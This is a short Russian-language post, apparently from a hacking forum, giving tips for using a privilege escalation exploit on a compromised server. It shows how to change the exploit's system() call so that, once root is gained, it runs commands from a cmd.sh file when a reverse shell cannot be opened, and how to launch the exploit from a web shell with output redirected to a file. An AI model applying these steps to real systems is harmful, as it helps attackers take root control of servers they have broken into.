На самом деле бэкконнект не всегда получается делать. В этом случае можно немного поправить сплойт:
system("echo ALEX-ALEX;/bin/sh");
на system("echo ALEX-ALEX;/bin/sh cmd.sh");
после повышения привелегий сплойт будет вполнять команды из cmd.sh под рутом.
Запуск сплойта в вебшеле: w00t.sh &> out.txt. Перенаправление лучше делать потому, что веб шел не выводит stderr поток и мы не увидим ошибок. Результат читаем из out.txt.